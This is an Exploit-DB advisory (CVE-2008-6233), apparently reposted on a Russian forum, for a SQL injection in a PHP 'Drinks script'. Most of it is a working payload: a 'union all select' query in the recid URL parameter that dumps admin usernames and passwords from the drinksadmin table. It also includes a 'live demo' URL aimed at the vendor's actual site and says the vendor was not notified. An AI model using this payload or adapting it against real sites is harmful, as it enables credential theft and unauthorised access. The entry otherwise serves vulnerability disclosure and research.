- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7007
- Проверка EDB
-
- Пройдено
- Автор
- EX TACY
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6233
- Дата публикации
- 2008-11-05
Код:
===========================================
Drinks script.
--------------------------------------------------------------------------------------
Vendor: http://www.fivedollarscripts.com
Demo: http://www.fivedollarscripts.com/drinks/index.php
Notified: No. Probably don't care.
Price: Five bones.
============================================
Exploit:
/path/index.php?cmd=6&recid=null union all select
1,null,concat(username,char(58),password),4,5,6,7,8,9,10,11,12 from
drinksadmin--
Live Demo:
http://www.fivedollarscripts.com/drinks/index.php?cmd=6&recid=null
union all select
1,null,concat(username,char(58),password),4,5,6,7,8,9,10,11,12 from
drinksadmin--
contact: x.s7acy at gmail dot com
greetings to bobthejanitor, mason, that new president guy, and the rest.
first script blah blah blah
=============================================
# milw0rm.com [2008-11-05]- Источник
- www.exploit-db.com
